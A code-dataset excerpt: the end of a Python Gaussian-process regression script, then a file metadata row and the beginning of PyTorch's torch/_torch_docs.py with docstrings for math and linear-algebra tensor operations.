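    # The response is scaled so its expected R^2 matches args.r2: x @ theta / sqrt(n) has
    # roughly unit variance (theta ~ N(0, I)), and the added Gaussian noise has variance 1/r2 - 1.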
y = x @ theta / args.n ** 0.5 + (1 / args.r2 - 1) ** 0.5 * np.random.randn(args.m)
x_tr, x_te, y_tr, y_te = train_test_split(x, y)
# kernel = SumKernel([SEKernel(dims=np.array([i])) for i in range(x.shape[1])])
# kernel = SEKernel()
kernel = ProductKernel([DotProductKernel(), ConstantKernel()])
gp = ConstantMeanGP(0, kernel, 1 - args.r2)
prev_marginal_loglik = float("-inf")
theta = gp.kernel.get_theta()
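    # Fit the kernel hyperparameters by gradient ascent on the marginal log-likelihood,
    # stopping once the improvement drops below --tol. (The step size is hard-coded to 1.0
    # here, so the --lr flag parsed above is not actually used.)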
for i in range(500):
marginal_loglik, grad = gp.fit(x_tr, y_tr, eval_gradient=True)
theta = theta + 1.0 * grad
gp.kernel.set_theta(theta)
print(f"Iteration {i}: {marginal_loglik:.2f}")
if marginal_loglik - prev_marginal_loglik < args.tol:
break
prev_marginal_loglik = marginal_loglik
mean, var = gp.predict(x_te)
print(f"R2: {r2_score(y_te, mean):.2f}")
print(f"RMSE: {((mean - y_te) ** 2).mean() ** 0.5:.2f}")
| 36.019608 | 86 | 0.665759 |
0830520b537b0ee0b5347d7d3dcf8e988eb302ec | 377,923 | py | Python | torch/_torch_docs.py | you74674/pytorch | 06838ce8b16b2cc2f9e903f3ebdd46659a0e66bb | ["Intel"] | 1 | 2022-01-20T03:49:23.000Z | 2022-01-20T03:49:23.000Z | torch/_torch_docs.py | you74674/pytorch | 06838ce8b16b2cc2f9e903f3ebdd46659a0e66bb | ["Intel"] | 1 | 2021-08-20T20:09:02.000Z | 2021-08-20T20:12:59.000Z | torch/_torch_docs.py | you74674/pytorch | 06838ce8b16b2cc2f9e903f3ebdd46659a0e66bb | ["Intel"] | null | null | null |
# -*- coding: utf-8 -*-
"""Adds docstrings to functions defined in the torch._C"""
import re
import torch._C
from torch._C import _add_docstr as add_docstr
def parse_kwargs(desc):
"""Maps a description of args to a dictionary of {argname: description}.
Input:
(' weight (Tensor): a weight tensor\n' +
' Some optional description')
Output: {
'weight': \
'weight (Tensor): a weight tensor\n Some optional description'
}
"""
# Split on exactly 4 spaces after a newline
regx = re.compile(r"\n\s{4}(?!\s)")
kwargs = [section.strip() for section in regx.split(desc)]
kwargs = [section for section in kwargs if len(section) > 0]
return {desc.split(' ')[0]: desc for desc in kwargs}
def merge_dicts(*dicts):
return {x: d[x] for d in dicts for x in d}
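    # e.g. merge_dicts({"a": 1}, {"a": 2, "b": 3}) == {"a": 2, "b": 3}; later dicts win on duplicate keys.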
common_args = parse_kwargs("""
input (Tensor): the input tensor.
generator (:class:`torch.Generator`, optional): a pseudorandom number generator for sampling
out (Tensor, optional): the output tensor.
memory_format (:class:`torch.memory_format`, optional): the desired memory format of
returned tensor. Default: ``torch.preserve_format``.
""")
reduceops_common_args = merge_dicts(common_args, parse_kwargs("""
dtype (:class:`torch.dtype`, optional): the desired data type of returned tensor.
If specified, the input tensor is casted to :attr:`dtype` before the operation
is performed. This is useful for preventing data type overflows. Default: None.
keepdim (bool): whether the output tensor has :attr:`dim` retained or not.
"""))
multi_dim_common = merge_dicts(reduceops_common_args, parse_kwargs("""
dim (int or tuple of ints): the dimension or dimensions to reduce.
"""), {'keepdim_details': """
If :attr:`keepdim` is ``True``, the output tensor is of the same size
as :attr:`input` except in the dimension(s) :attr:`dim` where it is of size 1.
Otherwise, :attr:`dim` is squeezed (see :func:`torch.squeeze`), resulting in the
output tensor having 1 (or ``len(dim)``) fewer dimension(s).
"""})
single_dim_common = merge_dicts(reduceops_common_args, parse_kwargs("""
dim (int): the dimension to reduce.
"""), {'keepdim_details': """If :attr:`keepdim` is ``True``, the output tensor is of the same size
as :attr:`input` except in the dimension :attr:`dim` where it is of size 1.
Otherwise, :attr:`dim` is squeezed (see :func:`torch.squeeze`), resulting in
the output tensor having 1 fewer dimension than :attr:`input`."""})
factory_common_args = merge_dicts(common_args, parse_kwargs("""
dtype (:class:`torch.dtype`, optional): the desired data type of returned tensor.
Default: if ``None``, uses a global default (see :func:`torch.set_default_tensor_type`).
layout (:class:`torch.layout`, optional): the desired layout of returned Tensor.
Default: ``torch.strided``.
device (:class:`torch.device`, optional): the desired device of returned tensor.
Default: if ``None``, uses the current device for the default tensor type
(see :func:`torch.set_default_tensor_type`). :attr:`device` will be the CPU
for CPU tensor types and the current CUDA device for CUDA tensor types.
requires_grad (bool, optional): If autograd should record operations on the
returned tensor. Default: ``False``.
pin_memory (bool, optional): If set, returned tensor would be allocated in
the pinned memory. Works only for CPU tensors. Default: ``False``.
memory_format (:class:`torch.memory_format`, optional): the desired memory format of
returned Tensor. Default: ``torch.contiguous_format``.
"""))
factory_like_common_args = parse_kwargs("""
input (Tensor): the size of :attr:`input` will determine size of the output tensor.
layout (:class:`torch.layout`, optional): the desired layout of returned tensor.
Default: if ``None``, defaults to the layout of :attr:`input`.
dtype (:class:`torch.dtype`, optional): the desired data type of returned Tensor.
Default: if ``None``, defaults to the dtype of :attr:`input`.
device (:class:`torch.device`, optional): the desired device of returned tensor.
Default: if ``None``, defaults to the device of :attr:`input`.
requires_grad (bool, optional): If autograd should record operations on the
returned tensor. Default: ``False``.
pin_memory (bool, optional): If set, returned tensor would be allocated in
the pinned memory. Works only for CPU tensors. Default: ``False``.
memory_format (:class:`torch.memory_format`, optional): the desired memory format of
returned Tensor. Default: ``torch.preserve_format``.
""")
factory_data_common_args = parse_kwargs("""
data (array_like): Initial data for the tensor. Can be a list, tuple,
NumPy ``ndarray``, scalar, and other types.
dtype (:class:`torch.dtype`, optional): the desired data type of returned tensor.
Default: if ``None``, infers data type from :attr:`data`.
device (:class:`torch.device`, optional): the desired device of returned tensor.
Default: if ``None``, uses the current device for the default tensor type
(see :func:`torch.set_default_tensor_type`). :attr:`device` will be the CPU
for CPU tensor types and the current CUDA device for CUDA tensor types.
requires_grad (bool, optional): If autograd should record operations on the
returned tensor. Default: ``False``.
pin_memory (bool, optional): If set, returned tensor would be allocated in
the pinned memory. Works only for CPU tensors. Default: ``False``.
""")
tf32_notes = {
"tf32_note": """This operator supports :ref:`TensorFloat32<tf32_on_ampere>`."""
}
reproducibility_notes = {
"forward_reproducibility_note": """This operation may behave nondeterministically when given tensors on \
a CUDA device. See :doc:`/notes/randomness` for more information.""",
"backward_reproducibility_note": """This operation may produce nondeterministic gradients when given tensors on \
a CUDA device. See :doc:`/notes/randomness` for more information.""",
"cudnn_reproducibility_note": """In some circumstances when given tensors on a CUDA device \
and using CuDNN, this operator may select a nondeterministic algorithm to increase performance. If this is \
undesirable, you can try to make the operation deterministic (potentially at \
a performance cost) by setting ``torch.backends.cudnn.deterministic = True``. \
See :doc:`/notes/randomness` for more information."""
}
add_docstr(torch.abs, r"""
abs(input, *, out=None) -> Tensor
Computes the absolute value of each element in :attr:`input`.
.. math::
\text{out}_{i} = |\text{input}_{i}|
""" + r"""
Args:
{input}
Keyword args:
{out}
Example::
>>> torch.abs(torch.tensor([-1, -2, 3]))
tensor([ 1, 2, 3])
""".format(**common_args))
add_docstr(torch.absolute,
r"""
absolute(input, *, out=None) -> Tensor
Alias for :func:`torch.abs`
""")
add_docstr(torch.acos, r"""
acos(input, *, out=None) -> Tensor
Computes the inverse cosine of each element in :attr:`input`.
.. math::
\text{out}_{i} = \cos^{-1}(\text{input}_{i})
""" + r"""
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.randn(4)
>>> a
tensor([ 0.3348, -0.5889, 0.2005, -0.1584])
>>> torch.acos(a)
tensor([ 1.2294, 2.2004, 1.3690, 1.7298])
""".format(**common_args))
add_docstr(torch.arccos, r"""
arccos(input, *, out=None) -> Tensor
Alias for :func:`torch.acos`.
""")
add_docstr(torch.acosh, r"""
acosh(input, *, out=None) -> Tensor
Returns a new tensor with the inverse hyperbolic cosine of the elements of :attr:`input`.
.. math::
\text{out}_{i} = \cosh^{-1}(\text{input}_{i})
Note:
The domain of the inverse hyperbolic cosine is `[1, inf)` and values outside this range
will be mapped to ``NaN``, except for `+ INF` for which the output is mapped to `+ INF`.
""" + r"""
Args:
{input}
Keyword arguments:
{out}
Example::
>>> a = torch.randn(4).uniform_(1, 2)
>>> a
tensor([ 1.3192, 1.9915, 1.9674, 1.7151 ])
>>> torch.acosh(a)
tensor([ 0.7791, 1.3120, 1.2979, 1.1341 ])
""".format(**common_args))
add_docstr(torch.arccosh, r"""
arccosh(input, *, out=None) -> Tensor
Alias for :func:`torch.acosh`.
""")
add_docstr(torch.index_add, r"""
index_add(input, dim, index, source, *, alpha=1, out=None) -> Tensor
See :meth:`~Tensor.index_add_` for function description.
""")
add_docstr(torch.add, r"""
add(input, other, *, alpha=1, out=None) -> Tensor
Adds :attr:`other`, scaled by :attr:`alpha`, to :attr:`input`.
.. math::
\text{{out}}_i = \text{{input}}_i + \text{{alpha}} \times \text{{other}}_i
""" + r"""
Supports :ref:`broadcasting to a common shape <broadcasting-semantics>`,
:ref:`type promotion <type-promotion-doc>`, and integer, float, and complex inputs.
Args:
{input}
other (Tensor or Number): the tensor or number to add to input.
Keyword arguments:
alpha (Number): the multiplier for :attr:`other`.
{out}
Examples::
>>> a = torch.randn(4)
>>> a
tensor([ 0.0202, 1.0985, 1.3506, -0.6056])
>>> torch.add(a, 20)
tensor([ 20.0202, 21.0985, 21.3506, 19.3944])
>>> b = torch.randn(4)
>>> b
tensor([-0.9732, -0.3497, 0.6245, 0.4022])
>>> c = torch.randn(4, 1)
>>> c
tensor([[ 0.3743],
[-1.7724],
[-0.5811],
[-0.8017]])
>>> torch.add(b, c, alpha=10)
tensor([[ 2.7695, 3.3930, 4.3672, 4.1450],
[-18.6971, -18.0736, -17.0994, -17.3216],
[ -6.7845, -6.1610, -5.1868, -5.4090],
[ -8.9902, -8.3667, -7.3925, -7.6147]])
""".format(**common_args))
add_docstr(torch.addbmm,
r"""
addbmm(input, batch1, batch2, *, beta=1, alpha=1, out=None) -> Tensor
Performs a batch matrix-matrix product of matrices stored
in :attr:`batch1` and :attr:`batch2`,
with a reduced add step (all matrix multiplications get accumulated
along the first dimension).
:attr:`input` is added to the final result.
:attr:`batch1` and :attr:`batch2` must be 3-D tensors each containing the
same number of matrices.
If :attr:`batch1` is a :math:`(b \times n \times m)` tensor, :attr:`batch2` is a
:math:`(b \times m \times p)` tensor, :attr:`input` must be
:ref:`broadcastable <broadcasting-semantics>` with a :math:`(n \times p)` tensor
and :attr:`out` will be a :math:`(n \times p)` tensor.
.. math::
out = \beta\ \text{input} + \alpha\ (\sum_{i=0}^{b-1} \text{batch1}_i \mathbin{@} \text{batch2}_i)
If :attr:`beta` is 0, then :attr:`input` will be ignored, and `nan` and `inf` in
it will not be propagated.
""" + r"""
For inputs of type `FloatTensor` or `DoubleTensor`, arguments :attr:`beta` and :attr:`alpha`
must be real numbers, otherwise they should be integers.
{tf32_note}
Args:
batch1 (Tensor): the first batch of matrices to be multiplied
batch2 (Tensor): the second batch of matrices to be multiplied
Keyword args:
beta (Number, optional): multiplier for :attr:`input` (:math:`\beta`)
input (Tensor): matrix to be added
alpha (Number, optional): multiplier for `batch1 @ batch2` (:math:`\alpha`)
{out}
Example::
>>> M = torch.randn(3, 5)
>>> batch1 = torch.randn(10, 3, 4)
>>> batch2 = torch.randn(10, 4, 5)
>>> torch.addbmm(M, batch1, batch2)
tensor([[ 6.6311, 0.0503, 6.9768, -12.0362, -2.1653],
[ -4.8185, -1.4255, -6.6760, 8.9453, 2.5743],
[ -3.8202, 4.3691, 1.0943, -1.1109, 5.4730]])
""".format(**common_args, **tf32_notes))
add_docstr(torch.addcdiv, r"""
addcdiv(input, tensor1, tensor2, *, value=1, out=None) -> Tensor
Performs the element-wise division of :attr:`tensor1` by :attr:`tensor2`,
multiplies the result by the scalar :attr:`value`, and adds it to :attr:`input`.
.. warning::
Integer division with addcdiv is no longer supported, and in a future
release addcdiv will perform a true division of tensor1 and tensor2.
The historic addcdiv behavior can be implemented as
(input + value * torch.trunc(tensor1 / tensor2)).to(input.dtype)
for integer inputs and as (input + value * tensor1 / tensor2) for float inputs.
The future addcdiv behavior is just the latter implementation:
(input + value * tensor1 / tensor2), for all dtypes.
.. math::
\text{out}_i = \text{input}_i + \text{value} \times \frac{\text{tensor1}_i}{\text{tensor2}_i}
""" + r"""
The shapes of :attr:`input`, :attr:`tensor1`, and :attr:`tensor2` must be
:ref:`broadcastable <broadcasting-semantics>`.
For inputs of type `FloatTensor` or `DoubleTensor`, :attr:`value` must be
a real number, otherwise an integer.
Args:
input (Tensor): the tensor to be added
tensor1 (Tensor): the numerator tensor
tensor2 (Tensor): the denominator tensor
Keyword args:
value (Number, optional): multiplier for :math:`\text{{tensor1}} / \text{{tensor2}}`
{out}
Example::
>>> t = torch.randn(1, 3)
>>> t1 = torch.randn(3, 1)
>>> t2 = torch.randn(1, 3)
>>> torch.addcdiv(t, t1, t2, value=0.1)
tensor([[-0.2312, -3.6496, 0.1312],
[-1.0428, 3.4292, -0.1030],
[-0.5369, -0.9829, 0.0430]])
""".format(**common_args))
add_docstr(torch.addcmul,
r"""
addcmul(input, tensor1, tensor2, *, value=1, out=None) -> Tensor
Performs the element-wise multiplication of :attr:`tensor1`
by :attr:`tensor2`, multiplies the result by the scalar :attr:`value`,
and adds it to :attr:`input`.
.. math::
\text{out}_i = \text{input}_i + \text{value} \times \text{tensor1}_i \times \text{tensor2}_i
""" + r"""
The shapes of :attr:`tensor`, :attr:`tensor1`, and :attr:`tensor2` must be
:ref:`broadcastable <broadcasting-semantics>`.
For inputs of type `FloatTensor` or `DoubleTensor`, :attr:`value` must be
a real number, otherwise an integer.
Args:
input (Tensor): the tensor to be added
tensor1 (Tensor): the tensor to be multiplied
tensor2 (Tensor): the tensor to be multiplied
Keyword args:
value (Number, optional): multiplier for :math:`tensor1 .* tensor2`
{out}
Example::
>>> t = torch.randn(1, 3)
>>> t1 = torch.randn(3, 1)
>>> t2 = torch.randn(1, 3)
>>> torch.addcmul(t, t1, t2, value=0.1)
tensor([[-0.8635, -0.6391, 1.6174],
[-0.7617, -0.5879, 1.7388],
[-0.8353, -0.6249, 1.6511]])
""".format(**common_args))
add_docstr(torch.addmm,
r"""
addmm(input, mat1, mat2, *, beta=1, alpha=1, out=None) -> Tensor
Performs a matrix multiplication of the matrices :attr:`mat1` and :attr:`mat2`.
The matrix :attr:`input` is added to the final result.
If :attr:`mat1` is a :math:`(n \times m)` tensor, :attr:`mat2` is a
:math:`(m \times p)` tensor, then :attr:`input` must be
:ref:`broadcastable <broadcasting-semantics>` with a :math:`(n \times p)` tensor
and :attr:`out` will be a :math:`(n \times p)` tensor.
:attr:`alpha` and :attr:`beta` are scaling factors on the matrix-matrix product between
:attr:`mat1` and :attr:`mat2` and the added matrix :attr:`input` respectively.
.. math::
\text{out} = \beta\ \text{input} + \alpha\ (\text{mat1}_i \mathbin{@} \text{mat2}_i)
If :attr:`beta` is 0, then :attr:`input` will be ignored, and `nan` and `inf` in
it will not be propagated.
""" + r"""
For inputs of type `FloatTensor` or `DoubleTensor`, arguments :attr:`beta` and
:attr:`alpha` must be real numbers, otherwise they should be integers.
{tf32_note}
Args:
input (Tensor): matrix to be added
mat1 (Tensor): the first matrix to be matrix multiplied
mat2 (Tensor): the second matrix to be matrix multiplied
Keyword args:
beta (Number, optional): multiplier for :attr:`input` (:math:`\beta`)
alpha (Number, optional): multiplier for :math:`mat1 @ mat2` (:math:`\alpha`)
{out}
Example::
>>> M = torch.randn(2, 3)
>>> mat1 = torch.randn(2, 3)
>>> mat2 = torch.randn(3, 3)
>>> torch.addmm(M, mat1, mat2)
tensor([[-4.8716, 1.4671, -1.3746],
[ 0.7573, -3.9555, -2.8681]])
""".format(**common_args, **tf32_notes))
add_docstr(torch.adjoint,
r"""
adjoint(Tensor) -> Tensor
Returns a view of the tensor conjugated and with the last two dimensions transposed.
``x.adjoint()`` is equivalent to ``x.transpose(-2, -1).conj()`` for complex tensors and
to ``x.transpose(-2, -1)`` for real tensors.
Example::
>>> x = torch.arange(4, dtype=torch.float)
>>> A = torch.complex(x, x).reshape(2, 2)
>>> A
tensor([[0.+0.j, 1.+1.j],
[2.+2.j, 3.+3.j]])
>>> A.adjoint()
tensor([[0.-0.j, 2.-2.j],
[1.-1.j, 3.-3.j]])
>>> (A.adjoint() == A.mH).all()
tensor(True)
""")
add_docstr(torch.sspaddmm,
r"""
sspaddmm(input, mat1, mat2, *, beta=1, alpha=1, out=None) -> Tensor
Matrix multiplies a sparse tensor :attr:`mat1` with a dense tensor
:attr:`mat2`, then adds the sparse tensor :attr:`input` to the result.
Note: This function is equivalent to :func:`torch.addmm`, except
:attr:`input` and :attr:`mat1` are sparse.
Args:
input (Tensor): a sparse matrix to be added
mat1 (Tensor): a sparse matrix to be matrix multiplied
mat2 (Tensor): a dense matrix to be matrix multiplied
Keyword args:
beta (Number, optional): multiplier for :attr:`mat` (:math:`\beta`)
alpha (Number, optional): multiplier for :math:`mat1 @ mat2` (:math:`\alpha`)
{out}
""".format(**common_args))
add_docstr(torch.smm,
r"""
smm(input, mat) -> Tensor
Performs a matrix multiplication of the sparse matrix :attr:`input`
with the dense matrix :attr:`mat`.
Args:
input (Tensor): a sparse matrix to be matrix multiplied
mat (Tensor): a dense matrix to be matrix multiplied
""")
add_docstr(torch.addmv,
r"""
addmv(input, mat, vec, *, beta=1, alpha=1, out=None) -> Tensor
Performs a matrix-vector product of the matrix :attr:`mat` and
the vector :attr:`vec`.
The vector :attr:`input` is added to the final result.
If :attr:`mat` is a :math:`(n \times m)` tensor, :attr:`vec` is a 1-D tensor of
size `m`, then :attr:`input` must be
:ref:`broadcastable <broadcasting-semantics>` with a 1-D tensor of size `n` and
:attr:`out` will be 1-D tensor of size `n`.
:attr:`alpha` and :attr:`beta` are scaling factors on matrix-vector product between
:attr:`mat` and :attr:`vec` and the added tensor :attr:`input` respectively.
.. math::
\text{out} = \beta\ \text{input} + \alpha\ (\text{mat} \mathbin{@} \text{vec})
If :attr:`beta` is 0, then :attr:`input` will be ignored, and `nan` and `inf` in
it will not be propagated.
""" + r"""
For inputs of type `FloatTensor` or `DoubleTensor`, arguments :attr:`beta` and
:attr:`alpha` must be real numbers, otherwise they should be integers
Args:
input (Tensor): vector to be added
mat (Tensor): matrix to be matrix multiplied
vec (Tensor): vector to be matrix multiplied
Keyword args:
beta (Number, optional): multiplier for :attr:`input` (:math:`\beta`)
alpha (Number, optional): multiplier for :math:`mat @ vec` (:math:`\alpha`)
{out}
Example::
>>> M = torch.randn(2)
>>> mat = torch.randn(2, 3)
>>> vec = torch.randn(3)
>>> torch.addmv(M, mat, vec)
tensor([-0.3768, -5.5565])
""".format(**common_args))
add_docstr(torch.addr,
r"""
addr(input, vec1, vec2, *, beta=1, alpha=1, out=None) -> Tensor
Performs the outer-product of vectors :attr:`vec1` and :attr:`vec2`
and adds it to the matrix :attr:`input`.
Optional values :attr:`beta` and :attr:`alpha` are scaling factors on the
outer product between :attr:`vec1` and :attr:`vec2` and the added matrix
:attr:`input` respectively.
.. math::
\text{out} = \beta\ \text{input} + \alpha\ (\text{vec1} \otimes \text{vec2})
If :attr:`beta` is 0, then :attr:`input` will be ignored, and `nan` and `inf` in
it will not be propagated.
""" + r"""
If :attr:`vec1` is a vector of size `n` and :attr:`vec2` is a vector
of size `m`, then :attr:`input` must be
:ref:`broadcastable <broadcasting-semantics>` with a matrix of size
:math:`(n \times m)` and :attr:`out` will be a matrix of size
:math:`(n \times m)`.
Args:
input (Tensor): matrix to be added
vec1 (Tensor): the first vector of the outer product
vec2 (Tensor): the second vector of the outer product
Keyword args:
beta (Number, optional): multiplier for :attr:`input` (:math:`\beta`)
alpha (Number, optional): multiplier for :math:`\text{{vec1}} \otimes \text{{vec2}}` (:math:`\alpha`)
{out}
Example::
>>> vec1 = torch.arange(1., 4.)
>>> vec2 = torch.arange(1., 3.)
>>> M = torch.zeros(3, 2)
>>> torch.addr(M, vec1, vec2)
tensor([[ 1., 2.],
[ 2., 4.],
[ 3., 6.]])
""".format(**common_args))
add_docstr(torch.allclose,
r"""
allclose(input, other, rtol=1e-05, atol=1e-08, equal_nan=False) -> bool
This function checks if all :attr:`input` and :attr:`other` satisfy the condition:
.. math::
\lvert \text{input} - \text{other} \rvert \leq \texttt{atol} + \texttt{rtol} \times \lvert \text{other} \rvert
""" + r"""
elementwise, for all elements of :attr:`input` and :attr:`other`. The behaviour of this function is analogous to
`numpy.allclose <https://docs.scipy.org/doc/numpy/reference/generated/numpy.allclose.html>`_
Args:
input (Tensor): first tensor to compare
other (Tensor): second tensor to compare
atol (float, optional): absolute tolerance. Default: 1e-08
rtol (float, optional): relative tolerance. Default: 1e-05
equal_nan (bool, optional): if ``True``, then two ``NaN`` s will be considered equal. Default: ``False``
Example::
>>> torch.allclose(torch.tensor([10000., 1e-07]), torch.tensor([10000.1, 1e-08]))
False
>>> torch.allclose(torch.tensor([10000., 1e-08]), torch.tensor([10000.1, 1e-09]))
True
>>> torch.allclose(torch.tensor([1.0, float('nan')]), torch.tensor([1.0, float('nan')]))
False
>>> torch.allclose(torch.tensor([1.0, float('nan')]), torch.tensor([1.0, float('nan')]), equal_nan=True)
True
""")
add_docstr(torch.all,
r"""
all(input) -> Tensor
Tests if all elements in :attr:`input` evaluate to `True`.
.. note:: This function matches the behaviour of NumPy in returning
output of dtype `bool` for all supported dtypes except `uint8`.
For `uint8` the dtype of output is `uint8` itself.
Example::
>>> a = torch.rand(1, 2).bool()
>>> a
tensor([[False, True]], dtype=torch.bool)
>>> torch.all(a)
tensor(False, dtype=torch.bool)
>>> a = torch.arange(0, 3)
>>> a
tensor([0, 1, 2])
>>> torch.all(a)
tensor(False)
.. function:: all(input, dim, keepdim=False, *, out=None) -> Tensor
:noindex:
For each row of :attr:`input` in the given dimension :attr:`dim`,
returns `True` if all elements in the row evaluate to `True` and `False` otherwise.
{keepdim_details}
Args:
{input}
{dim}
{keepdim}
Keyword args:
{out}
Example::
>>> a = torch.rand(4, 2).bool()
>>> a
tensor([[True, True],
[True, False],
[True, True],
[True, True]], dtype=torch.bool)
>>> torch.all(a, dim=1)
tensor([ True, False, True, True], dtype=torch.bool)
>>> torch.all(a, dim=0)
tensor([ True, False], dtype=torch.bool)
""".format(**single_dim_common))
add_docstr(torch.any,
r"""
any(input) -> Tensor
Tests if any element in :attr:`input` evaluates to `True`.
.. note:: This function matches the behaviour of NumPy in returning
output of dtype `bool` for all supported dtypes except `uint8`.
For `uint8` the dtype of output is `uint8` itself.
Example::
>>> a = torch.rand(1, 2).bool()
>>> a
tensor([[False, True]], dtype=torch.bool)
>>> torch.any(a)
tensor(True, dtype=torch.bool)
>>> a = torch.arange(0, 3)
>>> a
tensor([0, 1, 2])
>>> torch.any(a)
tensor(True)
.. function:: any(input, dim, keepdim=False, *, out=None) -> Tensor
:noindex:
For each row of :attr:`input` in the given dimension :attr:`dim`,
returns `True` if any element in the row evaluates to `True` and `False` otherwise.
{keepdim_details}
Args:
{input}
{dim}
{keepdim}
Keyword args:
{out}
Example::
>>> a = torch.randn(4, 2) < 0
>>> a
tensor([[ True, True],
[False, True],
[ True, True],
[False, False]])
>>> torch.any(a, 1)
tensor([ True, True, True, False])
>>> torch.any(a, 0)
tensor([True, True])
""".format(**single_dim_common))
add_docstr(torch.angle,
r"""
angle(input, *, out=None) -> Tensor
Computes the element-wise angle (in radians) of the given :attr:`input` tensor.
.. math::
\text{out}_{i} = angle(\text{input}_{i})
""" + r"""
Args:
{input}
Keyword args:
{out}
.. note:: Starting in PyTorch 1.8, angle returns pi for negative real numbers,
zero for non-negative real numbers, and propagates NaNs. Previously
the function would return zero for all real numbers and not propagate
floating-point NaNs.
Example::
>>> torch.angle(torch.tensor([-1 + 1j, -2 + 2j, 3 - 3j]))*180/3.14159
tensor([ 135., 135, -45])
""".format(**common_args))
add_docstr(torch.as_strided,
r"""
as_strided(input, size, stride, storage_offset=0) -> Tensor
Create a view of an existing `torch.Tensor` :attr:`input` with specified
:attr:`size`, :attr:`stride` and :attr:`storage_offset`.
.. warning::
Prefer using other view functions, like :meth:`torch.Tensor.expand`,
to setting a view's strides manually with `as_strided`, as this
function's behavior depends on the implementation of a tensor's storage.
The constructed view of the storage must only refer to elements within
the storage or a runtime error will be thrown, and if the view is
"overlapped" (with multiple indices referring to the same element in
memory) its behavior is undefined.
Args:
{input}
size (tuple or ints): the shape of the output tensor
stride (tuple or ints): the stride of the output tensor
storage_offset (int, optional): the offset in the underlying storage of the output tensor
Example::
>>> x = torch.randn(3, 3)
>>> x
tensor([[ 0.9039, 0.6291, 1.0795],
[ 0.1586, 2.1939, -0.4900],
[-0.1909, -0.7503, 1.9355]])
>>> t = torch.as_strided(x, (2, 2), (1, 2))
>>> t
tensor([[0.9039, 1.0795],
[0.6291, 0.1586]])
>>> t = torch.as_strided(x, (2, 2), (1, 2), 1)
tensor([[0.6291, 0.1586],
[1.0795, 2.1939]])
""".format(**common_args))
add_docstr(torch.as_tensor,
r"""
as_tensor(data, dtype=None, device=None) -> Tensor
Converts data into a tensor, sharing data and preserving autograd
history if possible.
If data is already a tensor with the requested dtype and device
then data itself is returned, but if data is a
tensor with a different dtype or device then it's copied as if using
`data.to(dtype=dtype, device=device)`.
If data is a NumPy array (an ndarray) with the same dtype and device then a
tensor is constructed using :func:`torch.from_numpy`.
.. seealso::
:func:`torch.tensor` never shares its data and creates a new "leaf tensor" (see :doc:`/notes/autograd`).
Args:
{data}
{dtype}
device (:class:`torch.device`, optional): the device of the constructed tensor. If None and data is a tensor
then the device of data is used. If None and data is not a tensor then
the result tensor is constructed on the CPU.
Example::
>>> a = numpy.array([1, 2, 3])
>>> t = torch.as_tensor(a)
>>> t
tensor([ 1, 2, 3])
>>> t[0] = -1
>>> a
array([-1, 2, 3])
>>> a = numpy.array([1, 2, 3])
>>> t = torch.as_tensor(a, device=torch.device('cuda'))
>>> t
tensor([ 1, 2, 3])
>>> t[0] = -1
>>> a
array([1, 2, 3])
""".format(**factory_data_common_args))
add_docstr(torch.asin, r"""
asin(input, *, out=None) -> Tensor
Returns a new tensor with the arcsine of the elements of :attr:`input`.
.. math::
\text{out}_{i} = \sin^{-1}(\text{input}_{i})
""" + r"""
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.randn(4)
>>> a
tensor([-0.5962, 1.4985, -0.4396, 1.4525])
>>> torch.asin(a)
tensor([-0.6387, nan, -0.4552, nan])
""".format(**common_args))
add_docstr(torch.arcsin, r"""
arcsin(input, *, out=None) -> Tensor
Alias for :func:`torch.asin`.
""")
add_docstr(torch.asinh,
r"""
asinh(input, *, out=None) -> Tensor
Returns a new tensor with the inverse hyperbolic sine of the elements of :attr:`input`.
.. math::
\text{out}_{i} = \sinh^{-1}(\text{input}_{i})
""" + r"""
Args:
{input}
Keyword arguments:
{out}
Example::
>>> a = torch.randn(4)
>>> a
tensor([ 0.1606, -1.4267, -1.0899, -1.0250 ])
>>> torch.asinh(a)
tensor([ 0.1599, -1.1534, -0.9435, -0.8990 ])
""".format(**common_args))
add_docstr(torch.arcsinh, r"""
arcsinh(input, *, out=None) -> Tensor
Alias for :func:`torch.asinh`.
""")
add_docstr(torch.atan, r"""
atan(input, *, out=None) -> Tensor
Returns a new tensor with the arctangent of the elements of :attr:`input`.
.. math::
\text{out}_{i} = \tan^{-1}(\text{input}_{i})
""" + r"""
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.randn(4)
>>> a
tensor([ 0.2341, 0.2539, -0.6256, -0.6448])
>>> torch.atan(a)
tensor([ 0.2299, 0.2487, -0.5591, -0.5727])
""".format(**common_args))
add_docstr(torch.arctan, r"""
arctan(input, *, out=None) -> Tensor
Alias for :func:`torch.atan`.
""")
add_docstr(torch.atan2,
r"""
atan2(input, other, *, out=None) -> Tensor
Element-wise arctangent of :math:`\text{{input}}_{{i}} / \text{{other}}_{{i}}`
with consideration of the quadrant. Returns a new tensor with the signed angles
in radians between vector :math:`(\text{{other}}_{{i}}, \text{{input}}_{{i}})`
and vector :math:`(1, 0)`. (Note that :math:`\text{{other}}_{{i}}`, the second
parameter, is the x-coordinate, while :math:`\text{{input}}_{{i}}`, the first
parameter, is the y-coordinate.)
The shapes of ``input`` and ``other`` must be
:ref:`broadcastable <broadcasting-semantics>`.
Args:
input (Tensor): the first input tensor
other (Tensor): the second input tensor
Keyword args:
{out}
Example::
>>> a = torch.randn(4)
>>> a
tensor([ 0.9041, 0.0196, -0.3108, -2.4423])
>>> torch.atan2(a, torch.randn(4))
tensor([ 0.9833, 0.0811, -1.9743, -1.4151])
""".format(**common_args))
add_docstr(torch.arctan2,
r"""
arctan2(input, other, *, out=None) -> Tensor
Alias for :func:`torch.atan2`.
""")
add_docstr(torch.atanh, r"""
atanh(input, *, out=None) -> Tensor
Returns a new tensor with the inverse hyperbolic tangent of the elements of :attr:`input`.
Note:
The domain of the inverse hyperbolic tangent is `(-1, 1)` and values outside this range
will be mapped to ``NaN``, except for the values `1` and `-1` for which the output is
mapped to `+/-INF` respectively.
.. math::
\text{out}_{i} = \tanh^{-1}(\text{input}_{i})
""" + r"""
Args:
{input}
Keyword arguments:
{out}
Example::
>>> a = torch.randn(4).uniform_(-1, 1)
>>> a
tensor([ -0.9385, 0.2968, -0.8591, -0.1871 ])
>>> torch.atanh(a)
tensor([ -1.7253, 0.3060, -1.2899, -0.1893 ])
""".format(**common_args))
add_docstr(torch.arctanh, r"""
arctanh(input, *, out=None) -> Tensor
Alias for :func:`torch.atanh`.
""")
add_docstr(torch.asarray,
r"""
asarray(obj, *, dtype=None, device=None, copy=None, requires_grad=False) -> Tensor
